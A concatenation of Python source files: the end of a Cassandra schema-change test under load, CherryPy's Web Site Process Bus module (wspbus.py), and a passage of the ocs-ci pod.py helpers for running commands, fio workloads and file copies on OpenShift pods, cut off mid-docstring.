%s/data/ks_ns2/cf_*/snapshots/testsnapshot/* %s/data/ks_ns2/cf_*/' % (node1.get_path(), node1.get_path())) os.system('cp -p %s/data/ks_ns2/cf_*/snapshots/testsnapshot/* %s/data/ks_ns2/cf_*/' % (node2.get_path(), node2.get_path())) # restart the cluster cluster.start() wait(2) self.validate_schema_consistent(node1) def load_test(self): """ apply schema changes while the cluster is under load. """ debug("load_test()") cluster = self.cluster cluster.populate(1).start() node1 = cluster.nodelist()[0] version = cluster.version() wait(2) cursor = self.cql_connection(node1) def stress(args=[]): debug("Stressing") node1.stress(args) debug("Done Stressing") def compact(): debug("Compacting...") node1.nodetool('compact') debug("Done Compacting.") # put some data into the cluster if version < "2.1": stress(['--num-keys=30000']) else: stress(['write', 'n=30000', '-rate', 'threads=8']) # now start stressing and compacting at the same time tcompact = Thread(target=compact) tcompact.start() wait(1) # now the cluster is under a lot of load. Make some schema changes. if version >= "2.1": cursor.execute('USE keyspace1') wait(1) cursor.execute('DROP TABLE standard1') wait(3) cursor.execute('CREATE TABLE standard1 (KEY text PRIMARY KEY)') elif version >= "1.2": cursor.execute('USE "Keyspace1"') wait(1) cursor.execute('DROP COLUMNFAMILY "Standard1"') wait(3) cursor.execute('CREATE COLUMNFAMILY "Standard1" (KEY text PRIMARY KEY)') else: cursor.execute('USE Keyspace1') wait(1) cursor.execute('DROP COLUMNFAMILY Standard1') wait(3) cursor.execute('CREATE COLUMNFAMILY Standard1 (KEY text PRIMARY KEY)') tcompact.join()
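
# For reference, validate_schema_consistent() above parses 'nodetool
# describecluster' output whose tail looks roughly like this (illustrative
# and version-dependent; one UUID per live schema version):
#
#     Schema versions:
#         64e0c2c6-57d4-3124-8cf8-7b76b3b0c301: [127.0.0.1, 127.0.0.2]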
wspbus.py
r"""An implementation of the Web Site Process Bus. This module is completely standalone, depending only on the stdlib. Web Site Process Bus -------------------- A Bus object is used to contain and manage site-wide behavior: daemonization, HTTP server start/stop, process reload, signal handling, drop privileges, PID file management, logging for all of these, and many more. In addition, a Bus object provides a place for each web framework to register code that runs in response to site-wide events (like process start and stop), or which controls or otherwise interacts with the site-wide components mentioned above. For example, a framework which uses file-based templates would add known template filenames to an autoreload component. Ideally, a Bus object will be flexible enough to be useful in a variety of invocation scenarios: 1. The deployer starts a site from the command line via a framework-neutral deployment script; applications from multiple frameworks are mixed in a single site. Command-line arguments and configuration files are used to define site-wide components such as the HTTP server, WSGI component graph, autoreload behavior, signal handling, etc. 2. The deployer starts a site via some other process, such as Apache; applications from multiple frameworks are mixed in a single site. Autoreload and signal handling (from Python at least) are disabled. 3. The deployer starts a site via a framework-specific mechanism; for example, when running tests, exploring tutorials, or deploying single applications from a single framework. The framework controls which site-wide components are enabled as it sees fit. The Bus object in this package uses topic-based publish-subscribe messaging to accomplish all this. A few topic channels are built in ('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and site containers are free to define their own. If a message is sent to a channel that has not been defined or has no listeners, there is no effect. In general, there should only ever be a single Bus object per process. Frameworks and site containers share a single Bus object by publishing messages and subscribing listeners. The Bus object works as a finite state machine which models the current state of the process. Bus methods move it from one state to another; those methods then publish to subscribed listeners on the channel for the new state.:: O | V STOPPING --> STOPPED --> EXITING -> X A A | | \___ | | \ | | V V STARTED <-- STARTING """ import atexit try: import ctypes except ImportError: """Google AppEngine is shipped without ctypes :seealso: http://stackoverflow.com/a/6523777/70170 """ ctypes = None import operator import os import sys import threading import time import traceback as _traceback import warnings import subprocess import functools import six # Here I save the value of os.getcwd(), which, if I am imported early enough, # will be the directory from which the startup script was run. This is needed # by _do_execv(), to change back to the original directory before execv()ing a # new process. This is a defense against the application having changed the # current working directory (which could make sys.executable "not found" if # sys.executable is a relative-path, and/or cause other problems). 
_startup_cwd = os.getcwd() class ChannelFailures(Exception): """Exception raised during errors on Bus.publish().""" delimiter = '\n' def __init__(self, *args, **kwargs): """Initialize ChannelFailures errors wrapper.""" super(ChannelFailures, self).__init__(*args, **kwargs) self._exceptions = list() def handle_exception(self): """Append the current exception to self.""" self._exceptions.append(sys.exc_info()[1]) def get_instances(self): """Return a list of seen exception instances.""" return self._exceptions[:] def __str__(self): """Render the list of errors, which happened in channel.""" exception_strings = map(repr, self.get_instances()) return self.delimiter.join(exception_strings) __repr__ = __str__ def __bool__(self): """Determine whether any error happened in channel.""" return bool(self._exceptions) __nonzero__ = __bool__ # Use a flag to indicate the state of the bus. class _StateEnum(object): class State(object): name = None def __repr__(self): return 'states.%s' % self.name def __setattr__(self, key, value): if isinstance(value, self.State): value.name = key object.__setattr__(self, key, value) states = _StateEnum() states.STOPPED = states.State() states.STARTING = states.State() states.STARTED = states.State() states.STOPPING = states.State() states.EXITING = states.State() try: import fcntl except ImportError: max_files = 0 else: try: max_files = os.sysconf('SC_OPEN_MAX') except AttributeError: max_files = 1024 class Bus(object): """Process state-machine and messenger for HTTP site deployment. All listeners for a given channel are guaranteed to be called even if others at the same channel fail. Each failure is logged, but execution proceeds on to the next listener. The only way to stop all processing from inside a listener is to raise SystemExit and stop the whole server. """ states = states state = states.STOPPED execv = False max_cloexec_files = max_files def __init__(self): """Initialize pub/sub bus.""" self.execv = False self.state = states.STOPPED channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main' self.listeners = dict( (channel, set()) for channel in channels ) self._priorities = {} def subscribe(self, channel, callback=None, priority=None): """Add the given callback at the given channel (if not present). If callback is None, return a partial suitable for decorating the callback. 
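
        Example (assuming bus is a Bus instance; decorator form per the
        note above):

            @bus.subscribe('graceful', priority=10)
            def do_reload():
                ...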
""" if callback is None: return functools.partial( self.subscribe, channel, priority=priority, ) ch_listeners = self.listeners.setdefault(channel, set()) ch_listeners.add(callback) if priority is None: priority = getattr(callback, 'priority', 50) self._priorities[(channel, callback)] = priority def unsubscribe(self, channel, callback): """Discard the given callback (if present).""" listeners = self.listeners.get(channel) if listeners and callback in listeners: listeners.discard(callback) del self._priorities[(channel, callback)] def publish(self, channel, *args, **kwargs): """Return output of all subscribers for the given channel.""" if channel not in self.listeners: return [] exc = ChannelFailures() output = [] raw_items = ( (self._priorities[(channel, listener)], listener) for listener in self.listeners[channel] ) items = sorted(raw_items, key=operator.itemgetter(0)) for priority, listener in items: try: output.append(listener(*args, **kwargs)) except KeyboardInterrupt: raise except SystemExit: e = sys.exc_info()[1] # If we have previous errors ensure the exit code is non-zero if exc and e.code == 0: e.code = 1 raise except Exception: exc.handle_exception() if channel == 'log': # Assume any further messages to 'log' will fail. pass else: self.log('Error in %r listener %r' % (channel, listener), level=40, traceback=True) if exc: raise exc return output def _clean_exit(self): """Assert that the Bus is not running in atexit handler callback.""" if self.state != states.EXITING: warnings.warn( 'The main thread is exiting, but the Bus is in the %r state; ' 'shutting it down automatically now. You must either call ' 'bus.block() after start(), or call bus.exit() before the ' 'main thread exits.' % self.state, RuntimeWarning) self.exit() def start(self): """Start all services.""" atexit.register(self._clean_exit) self.state = states.STARTING self.log('Bus STARTING') try: self.publish('start') self.state = states.STARTED self.log('Bus STARTED') except (KeyboardInterrupt, SystemExit): raise except Exception: self.log('Shutting down due to error in start listener:', level=40, traceback=True) e_info = sys.exc_info()[1] try: self.exit() except Exception: # Any stop/exit errors will be logged inside publish(). pass # Re-raise the original error raise e_info def exit(self): """Stop all services and prepare to exit the process.""" exitstate = self.state EX_SOFTWARE = 70 try: self.stop() self.state = states.EXITING self.log('Bus EXITING') self.publish('exit') # This isn't strictly necessary, but it's better than seeing # "Waiting for child threads to terminate..." and then nothing. self.log('Bus EXITED') except Exception: # This method is often called asynchronously (whether thread, # signal handler, console handler, or atexit handler), so we # can't just let exceptions propagate out unhandled. # Assume it's been logged and just die. os._exit(EX_SOFTWARE) if exitstate == states.STARTING: # exit() was called before start() finished, possibly due to # Ctrl-C because a start listener got stuck. In this case, # we could get stuck in a loop where Ctrl-C never exits the # process, so we just call os.exit here. os._exit(EX_SOFTWARE) def restart(self): """Restart the process (may close connections). This method does not restart the process from the calling thread; instead, it stops the bus and asks the main thread to call execv. 
""" self.execv = True self.exit() def graceful(self): """Advise all services to reload.""" self.log('Bus graceful') self.publish('graceful') def block(self, interval=0.1): """Wait for the EXITING state, KeyboardInterrupt or SystemExit. This function is intended to be called only by the main thread. After waiting for the EXITING state, it also waits for all threads to terminate, and then calls os.execv if self.execv is True. This design allows another thread to call bus.restart, yet have the main thread perform the actual execv call (required on some platforms). """ try: self.wait(states.EXITING, interval=interval, channel='main') except (KeyboardInterrupt, IOError): # The time.sleep call might raise # "IOError: [Errno 4] Interrupted function call" on KBInt. self.log('Keyboard Interrupt: shutting down bus') self.exit() except SystemExit: self.log('SystemExit raised: shutting down bus') self.exit() raise # Waiting for ALL child threads to finish is necessary on OS X. # See https://github.com/cherrypy/cherrypy/issues/581. # It's also good to let them all shut down before allowing # the main thread to call atexit handlers. # See https://github.com/cherrypy/cherrypy/issues/751. self.log('Waiting for child threads to terminate...') for t in threading.enumerate(): # Validate the we're not trying to join the MainThread # that will cause a deadlock and the case exist when # implemented as a windows service and in any other case # that another thread executes cherrypy.engine.exit() if ( t != threading.currentThread() and not isinstance(t, threading._MainThread) and # Note that any dummy (external) threads are # always daemonic. not t.daemon ): self.log('Waiting for thread %s.' % t.getName()) t.join() if self.execv: self._do_execv() def wait(self, state, interval=0.1, channel=None): """Poll for the given state(s) at intervals; publish to channel.""" if isinstance(state, (tuple, list)): states = state else: states = [state] while self.state not in states: time.sleep(interval) self.publish(channel) def _do_execv(self): """Re-execute the current process. This must be called from the main thread, because certain platforms (OS X) don't allow execv to be called in a child thread very well. """ try: args = self._get_true_argv() except NotImplementedError: """It's probably win32 or GAE""" args = [sys.executable] + self._get_interpreter_argv() + sys.argv self.log('Re-spawning %s' % ' '.join(args)) self._extend_pythonpath(os.environ) if sys.platform[:4] == 'java': from _systemrestart import SystemRestart raise SystemRestart else: if sys.platform == 'win32': args = ['"%s"' % arg for arg in args] os.chdir(_startup_cwd) if self.max_cloexec_files: self._set_cloexec() os.execv(sys.executable, args) @staticmethod def _get_interpreter_argv(): """Retrieve current Python interpreter's arguments. Returns empty tuple in case of frozen mode, uses built-in arguments reproduction function otherwise. Frozen mode is possible for the app has been packaged into a binary executable using py2exe. In this case the interpreter's arguments are already built-in into that executable. :seealso: https://github.com/cherrypy/cherrypy/issues/1526 Ref: https://pythonhosted.org/PyInstaller/runtime-information.html """ return ([] if getattr(sys, 'frozen', False) else subprocess._args_from_interpreter_flags()) @staticmethod def _get_true_argv(): """Retrieve all real arguments of the python interpreter. 
...even those not listed in ``sys.argv`` :seealso: http://stackoverflow.com/a/28338254/595220 :seealso: http://stackoverflow.com/a/6683222/595220 :seealso: http://stackoverflow.com/a/28414807/595220 """ try: char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p argv = ctypes.POINTER(char_p)() argc = ctypes.c_int() ctypes.pythonapi.Py_GetArgcArgv( ctypes.byref(argc), ctypes.byref(argv), ) _argv = argv[:argc.value] # The code below is trying to correctly handle special cases. # `-c`'s argument interpreted by Python itself becomes `-c` as # well. Same applies to `-m`. This snippet is trying to survive # at least the case with `-m` # Ref: https://github.com/cherrypy/cherrypy/issues/1545 # Ref: python/cpython@418baf9 argv_len, is_command, is_module = len(_argv), False, False try: m_ind = _argv.index('-m') if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'): """ In some older Python versions `-m`'s argument may be substituted with `-c`, not `-m` """ is_module = True except (IndexError, ValueError): m_ind = None try: c_ind = _argv.index('-c') if m_ind < argv_len - 1 and _argv[c_ind + 1] == '-c': is_command = True except (IndexError, ValueError): c_ind = None if is_module: """It's containing `-m -m` sequence of arguments""" if is_command and c_ind < m_ind: """There's `-c -c` before `-m`""" raise RuntimeError( "Cannot reconstruct command from '-c'. Ref: " 'https://github.com/cherrypy/cherrypy/issues/1545') # Survive module argument here original_module = sys.argv[0] if not os.access(original_module, os.R_OK): """There's no such module exist""" raise AttributeError( "{} doesn't seem to be a module " 'accessible by current user'.format(original_module)) del _argv[m_ind:m_ind + 2] # remove `-m -m` # ... and substitute it with the original module path: _argv.insert(m_ind, original_module) elif is_command: """It's containing just `-c -c` sequence of arguments""" raise RuntimeError( "Cannot reconstruct command from '-c'. " 'Ref: https://github.com/cherrypy/cherrypy/issues/1545') except AttributeError: """It looks Py_GetArgcArgv is completely absent in some environments It is known, that there's no Py_GetArgcArgv in MS Windows and ``ctypes`` module is completely absent in Google AppEngine :seealso: https://github.com/cherrypy/cherrypy/issues/1506 :seealso: https://github.com/cherrypy/cherrypy/issues/1512 :ref: http://bit.ly/2gK6bXK """ raise NotImplementedError else: return _argv @staticmethod def _extend_pythonpath(env): """Prepend current working dir to PATH environment variable if needed. If sys.path[0] is an empty string, the interpreter was likely invoked with -m and the effective path is about to change on re-exec. Add the current directory to $PYTHONPATH to ensure that the new process sees the same path. This issue cannot be addressed in the general case because Python cannot reliably reconstruct the original command line (http://bugs.python.org/issue14208). (This idea filched from tornado.autoreload) """ path_prefix = '.' + os.pathsep existing_path = env.get('PYTHONPATH', '') needs_patch = ( sys.path[0] == '' and not existing_path.startswith(path_prefix) ) if needs_patch: env['PYTHONPATH'] = path_prefix + existing_path def _set_cloexec(self): """Set the CLOEXEC flag on all open files (except stdin/out/err). If self.max_cloexec_files is an integer (the default), then on platforms which support it, it represents the max open files setting for the operating system. 
This function will be called just before the process is restarted via os.execv() to prevent open files from persisting into the new process. Set self.max_cloexec_files to 0 to disable this behavior. """ for fd in range(3, self.max_cloexec_files): # skip stdin/out/err try: flags = fcntl.fcntl(fd, fcntl.F_GETFD) except IOError: continue fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC) def stop(self): """Stop all services.""" self.state = states.STOPPING self.log('Bus STOPPING') self.publish('stop') self.state = states.STOPPED self.log('Bus STOPPED') def start_with_callback(self, func, args=None, kwargs=None): """Start 'func' in a new thread T, then start self (and return T).""" if args is None: args = () if kwargs is None: kwargs = {} args = (func,) + args def _callback(func, *a, **kw): self.wait(states.STARTED) func(*a, **kw) t = threading.Thread(target=_callback, args=args, kwargs=kwargs) t.setName('Bus Callback ' + t.getName()) t.start() self.start() return t def log(self, msg='', level=20, traceback=False): """Log the given message. Append the last traceback if requested.""" if traceback: msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info())) self.publish('log', msg, level) bus = Bus()
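

# ---------------------------------------------------------------------------
# Illustrative usage sketch (added for clarity; not part of the upstream
# module). It assumes this file is run directly: a print-based 'log'
# listener and a 'start' listener are subscribed, and a timer thread asks
# the bus to exit so that block() can return in the main thread.
if __name__ == '__main__':
    # Surface bus.log() output, which otherwise goes to an empty channel.
    bus.subscribe('log', lambda msg, level: print('[%s] %s' % (level, msg)))

    def announce():
        print('demo listener: bus has started')

    bus.subscribe('start', announce)

    # Request shutdown from another thread shortly after startup; block()
    # waits for the EXITING state and then joins the remaining threads.
    threading.Timer(0.5, bus.exit).start()
    bus.start()
    bus.block()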
pod.py
""" Pod related functionalities and context info Each pod in the openshift cluster will have a corresponding pod object """ import logging import os import re import yaml import tempfile import time import calendar from threading import Thread import base64 from semantic_version import Version from ocs_ci.ocs.bucket_utils import craft_s3_command from ocs_ci.ocs.ocp import OCP, verify_images_upgraded from ocs_ci.helpers import helpers from ocs_ci.helpers.proxy import update_container_with_proxy_env from ocs_ci.ocs import constants, defaults, node, workload, ocp from ocs_ci.framework import config from ocs_ci.ocs.exceptions import ( CommandFailed, NonUpgradedImagesFoundError, ResourceWrongStatusException, TimeoutExpiredError, UnavailableResourceException, ResourceNotFoundError, ) from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern from ocs_ci.ocs.resources.ocs import OCS from ocs_ci.ocs.resources.job import get_job_obj, get_jobs_with_prefix from ocs_ci.utility import templating from ocs_ci.utility.utils import ( run_cmd, check_timeout_reached, TimeoutSampler, get_ocp_version, ) from ocs_ci.utility.utils import check_if_executable_in_path from ocs_ci.utility.retry import retry logger = logging.getLogger(__name__) FIO_TIMEOUT = 600 TEXT_CONTENT = ( "Lorem ipsum dolor sit amet, consectetur adipiscing elit, " "sed do eiusmod tempor incididunt ut labore et dolore magna " "aliqua. Ut enim ad minim veniam, quis nostrud exercitation " "ullamco laboris nisi ut aliquip ex ea commodo consequat. " "Duis aute irure dolor in reprehenderit in voluptate velit " "esse cillum dolore eu fugiat nulla pariatur. Excepteur sint " "occaecat cupidatat non proident, sunt in culpa qui officia " "deserunt mollit anim id est laborum." ) TEST_FILE = "/var/lib/www/html/test" FEDORA_TEST_FILE = "/mnt/test" class Pod(OCS): """ Handles per pod related context """ def __init__(self, **kwargs): """ Initializer function kwargs: Copy of ocs/defaults.py::<some pod> dictionary """ self.pod_data = kwargs # configure http[s]_proxy env variable, if applicable update_container_with_proxy_env(self.pod_data) super(Pod, self).__init__(**kwargs) with tempfile.NamedTemporaryFile( mode="w+", prefix="POD_", delete=False ) as temp_info: self.temp_yaml = temp_info.name self._name = self.pod_data.get("metadata").get("name") self._labels = self.get_labels() self._roles = [] self.ocp = OCP( api_version=defaults.API_VERSION, kind=constants.POD, namespace=self.namespace, ) self.fio_thread = None # TODO: get backend config !! 
self.wl_obj = None self.wl_setup_done = False @property def name(self): return self._name @property def namespace(self): return self._namespace @property def roles(self): return self._roles @property def labels(self): return self._labels @property def restart_count(self): return self.get().get("status").get("containerStatuses")[0].get("restartCount") def __setattr__(self, key, val): self.__dict__[key] = val def add_role(self, role): """ Adds a new role for this pod Args: role (str): New role to be assigned for this pod """ self._roles.append(role) def get_fio_results(self, timeout=FIO_TIMEOUT): """ Get FIO execution results Returns: dict: Dictionary represents the FIO execution results Raises: Exception: In case of exception from FIO """ logger.info(f"Waiting for FIO results from pod {self.name}") try: result = self.fio_thread.result(timeout) if result: return yaml.safe_load(result) raise CommandFailed(f"FIO execution results: {result}.") except CommandFailed as ex: logger.exception(f"FIO failed: {ex}") raise except Exception as ex: logger.exception(f"Found Exception: {ex}") raise def exec_cmd_on_pod( self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs ): """ Execute a command on a pod (e.g. oc rsh) Args: command (str): The command to execute on the given pod out_yaml_format (bool): whether to return yaml loaded python object OR to return raw output secrets (list): A list of secrets to be masked with asterisks This kwarg is popped in order to not interfere with subprocess.run(``**kwargs``) timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds Returns: Munch Obj: This object represents a returned yaml file """ rsh_cmd = f"rsh {self.name} " rsh_cmd += command return self.ocp.exec_oc_cmd( rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs ) def exec_s3_cmd_on_pod(self, command, mcg_obj=None): """ Execute an S3 command on a pod Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials command (str): The command to execute on the given pod Returns: Munch Obj: This object represents a returned yaml file """ return self.exec_cmd_on_pod( craft_s3_command(command, mcg_obj), out_yaml_format=False, secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint] if mcg_obj else None, ) def exec_sh_cmd_on_pod(self, command, sh="bash"): """ Execute a pure bash command on a pod via oc exec where you can use bash syntaxt like &&, ||, ;, for loop and so on. 
Args: command (str): The command to execute on the given pod Returns: str: stdout of the command """ cmd = f'exec {self.name} -- {sh} -c "{command}"' return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False) def get_labels(self): """ Get labels from pod Raises: NotFoundError: If resource not found Returns: dict: All the openshift labels on a given pod """ return self.pod_data.get("metadata").get("labels") def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"): """ Execute a Ceph command on the Ceph tools pod Args: ceph_cmd (str): The Ceph command to execute on the Ceph tools pod format (str): The returning output format of the Ceph command Returns: dict: Ceph command output Raises: CommandFailed: In case the pod is not a toolbox pod """ if "rook-ceph-tools" not in self.labels.values(): raise CommandFailed("Ceph commands can be executed only on toolbox pod") ceph_cmd = ceph_cmd if format: ceph_cmd += f" --format {format}" out = self.exec_cmd_on_pod(ceph_cmd) # For some commands, like "ceph fs ls", the returned output is a list if isinstance(out, list): return [item for item in out if item] return out def get_storage_path(self, storage_type="fs"): """ Get the pod volume mount path or device path Returns: str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs else device path of raw block pv """ # TODO: Allow returning a path of a specified volume of a specified # container if storage_type == "block": return ( self.pod_data.get("spec") .get("containers")[0] .get("volumeDevices")[0] .get("devicePath") ) return ( self.pod_data.get("spec") .get("containers")[0] .get("volumeMounts")[0] .get("mountPath") ) def workload_setup(self, storage_type, jobs=1): """ Do setup on pod for running FIO Args: storage_type (str): 'fs' or 'block' jobs (int): Number of jobs to execute FIO """ work_load = "fio" name = f"test_workload_{work_load}" path = self.get_storage_path(storage_type) # few io parameters for Fio self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs) assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}" self.wl_setup_done = True def run_io( self, storage_type, size, io_direction="rw", rw_ratio=75, jobs=1, runtime=60, depth=4, rate="1m", rate_process="poisson", fio_filename=None, bs="4K", end_fsync=0, invalidate=None, ): """ Execute FIO on a pod This operation will run in background and will store the results in 'self.thread.result()'. In order to wait for the output and not continue with the test until FIO is done, call self.thread.result() right after calling run_io. See tests/manage/test_pvc_deletion_during_io.py::test_run_io for usage of FIO Args: storage_type (str): 'fs' or 'block' size (str): Size in MB, e.g. '200M' io_direction (str): Determines the operation: 'ro', 'wo', 'rw' (default: 'rw') rw_ratio (int): Determines the reads and writes using a <rw_ratio>%/100-<rw_ratio>% (e.g. the default is 75 which means it is 75%/25% which equivalent to 3 reads are performed for every 1 write) jobs (int): Number of jobs to execute FIO runtime (int): Number of seconds IO should run for depth (int): IO depth rate (str): rate of IO default 1m, e.g. 16k rate_process (str): kind of rate process default poisson, e.g. poisson fio_filename(str): Name of fio file created on app pod's mount point bs (str): Block size, e.g. 4K end_fsync (int): If 1, fio will sync file contents when a write stage has completed. 
Fio default is 0
            invalidate (bool): Invalidate the buffer/page cache parts of the
                files to be used prior to starting I/O

        """
        if not self.wl_setup_done:
            self.workload_setup(storage_type=storage_type, jobs=jobs)

        if io_direction == "rw":
            self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
            self.io_params["rwmixread"] = rw_ratio
        else:
            self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
        if invalidate is not None:
            self.io_params["invalidate"] = invalidate
        self.io_params["runtime"] = runtime
        size = size if isinstance(size, str) else f"{size}G"
        self.io_params["size"] = size
        if fio_filename:
            self.io_params["filename"] = fio_filename
        self.io_params["iodepth"] = depth
        self.io_params["rate"] = rate
        self.io_params["rate_process"] = rate_process
        self.io_params["bs"] = bs
        if end_fsync:
            self.io_params["end_fsync"] = end_fsync
        self.fio_thread = self.wl_obj.run(**self.io_params)

    def fillup_fs(self, size, fio_filename=None):
        """
        Execute FIO on a pod to fill up a file
        This will run sequential IO of 1MB block size to fill up the file
        with data
        This operation will run in background and will store the results in
        'self.thread.result()'.
        In order to wait for the output and not continue with the test until
        FIO is done, call self.thread.result() right after calling run_io.
        See tests/manage/test_pvc_deletion_during_io.py::test_run_io
        for usage of FIO

        Args:
            size (str): Size in MB, e.g. '200M'
            fio_filename(str): Name of fio file created on app pod's mount point

        """
        if not self.wl_setup_done:
            self.workload_setup(storage_type="fs", jobs=1)

        self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
        size = size if isinstance(size, str) else f"{size}M"
        self.io_params["size"] = size
        if fio_filename:
            self.io_params["filename"] = fio_filename
        self.fio_thread = self.wl_obj.run(**self.io_params)

    def run_git_clone(self, skip_install=True):
        """
        Execute git clone on a pod to simulate a Jenkins user

        Args:
            skip_install (bool): By default True, skips git package
                installation in pod

        """
        name = "test_workload"
        work_load = "jenkins"

        wl = workload.WorkLoad(
            name=name, work_load=work_load, pod=self, path=self.get_storage_path()
        )
        if not skip_install:
            assert wl.setup(), "Setup for git failed"
        wl.run()

    def install_packages(self, packages):
        """
        Install packages in a Pod

        Args:
            packages (list): List of packages to install

        """
        if isinstance(packages, list):
            packages = " ".join(packages)

        cmd = f"yum install {packages} -y"
        self.exec_cmd_on_pod(cmd, out_yaml_format=False)

    def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
        """
        Upload a file from pod to server

        Args:
            server (str): Name of the server to upload to
            authkey (str): Authentication file (.pem file)
            localpath (str): Local file/dir in pod to upload
            remotepath (str): Target path on the remote server
            user (str): User name to connect to server

        """
        if not user:
            user = "root"

        cmd = (
            f'scp -i {authkey} -o "StrictHostKeyChecking no"'
            f" -r {localpath} {user}@{server}:{remotepath}"
        )
        self.exec_cmd_on_pod(cmd, out_yaml_format=False)

    def exec_cmd_on_node(self, server, authkey, cmd, user=None):
        """
        Run command on a remote server from pod

        Args:
            server (str): Name of the server to run the command
            authkey (str): Authentication file (.pem file)
            cmd (str): command to run on server from pod
            user (str): User name to connect to server

        """
        if not user:
            user = "root"

        cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
        self.exec_cmd_on_pod(cmd, out_yaml_format=False)

    def get_memory(self, container_name):
        """
        Get the 
pod memory size Args: container_name (str): The name of the container to look for Returns: str: The container memory size (e.g. '5Gi') """ pod_containers = self.pod_data.get("spec").get("containers") matched_containers = [ c for c in pod_containers if c.get("name") == container_name ] if len(matched_containers) > 1: logger.error( f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}" ) container = matched_containers[0] return container.get("resources").get("limits").get("memory") def get_node(self): """ Gets the node name Returns: str: Node name """ if config.ENV_DATA.get( "platform", "" ).lower() == "aws" and config.DEPLOYMENT.get("local_storage"): return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"] else: return self.pod_data["spec"]["nodeName"] # Helper functions for Pods def get_all_pods( namespace=None, selector=None, selector_label="app", exclude_selector=False, wait=False, ): """ Get all pods in a namespace. Args: namespace (str): Name of the namespace If namespace is None - get all pods selector (list) : List of the resource selector to search with. Example: ['alertmanager','prometheus'] selector_label (str): Label of selector (default: app). exclude_selector (bool): If list of the resource selector not to search with Returns: list: List of Pod objects """ ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) # In case of >4 worker nodes node failures automatic failover of pods to # other nodes will happen. # So, we are waiting for the pods to come up on new node if wait: wait_time = 180 logger.info(f"Waiting for {wait_time}s for the pods to stabilize") time.sleep(wait_time) pods = ocp_pod_obj.get()["items"] if selector: if exclude_selector: pods_new = [ pod for pod in pods if pod["metadata"].get("labels", {}).get(selector_label) not in selector ] else: pods_new = [ pod for pod in pods if pod["metadata"].get("labels", {}).get(selector_label) in selector ] pods = pods_new pod_objs = [Pod(**pod) for pod in pods] return pod_objs def get_ceph_tools_pod(): """ Get the Ceph tools pod Returns: Pod object: The Ceph tools pod object """ ocp_pod_obj = OCP( kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"] ) ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"] if not ct_pod_items: # setup ceph_toolbox pod if the cluster has been setup by some other CI setup_ceph_toolbox() ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"] assert ct_pod_items, "No Ceph tools pod found" # In the case of node failure, the CT pod will be recreated with the old # one in status Terminated. 
Therefore, need to filter out the Terminated pod
    running_ct_pods = list()
    for pod in ct_pod_items:
        if (
            ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
            == constants.STATUS_RUNNING
        ):
            running_ct_pods.append(pod)
    assert running_ct_pods, "No running Ceph tools pod found"
    ceph_pod = Pod(**running_ct_pods[0])
    return ceph_pod


def get_csi_provisioner_pod(interface):
    """
    Get the provisioner pod based on interface

    Returns:
        Pod object: The provisioner pod object based on interface

    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
    )
    selector = (
        "app=csi-rbdplugin-provisioner"
        if (
            interface == constants.CEPHBLOCKPOOL
            or interface == constants.CEPHBLOCKPOOL_THICK
        )
        else "app=csi-cephfsplugin-provisioner"
    )
    provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
    assert provision_pod_items, f"No {interface} provisioner pod found"
    provisioner_pod = (
        Pod(**provision_pod_items[0]).name,
        Pod(**provision_pod_items[1]).name,
    )
    return provisioner_pod


def get_csi_snapshoter_pod():
    """
    Get the csi snapshot controller pod

    Returns:
        Pod object: csi snapshot controller pod

    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace="openshift-cluster-storage-operator"
    )
    selector = "app=csi-snapshot-controller"
    snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
    snapshotner_pod = Pod(**snapshotner_pod[0]).name
    return snapshotner_pod


def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
    """
    Fetches info about rgw pods in the cluster

    Args:
        rgw_label (str): label associated with rgw pods
            (default: constants.RGW_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: none)

    Returns:
        list: Pod objects of rgw pods

    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    rgws = get_pods_having_label(rgw_label, namespace)
    return [Pod(**rgw) for rgw in rgws]


def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
    """
    Fetches info about the ocs-operator pod in the cluster

    Args:
        ocs_label (str): label associated with ocs_operator pod
            (default: constants.OCS_OPERATOR_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: none)

    Returns:
        Pod object: ocs_operator pod object

    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    ocs_operator = get_pods_having_label(ocs_label, namespace)
    ocs_operator_pod = Pod(**ocs_operator[0])
    return ocs_operator_pod


def list_ceph_images(pool_name="rbd"):
    """
    Args:
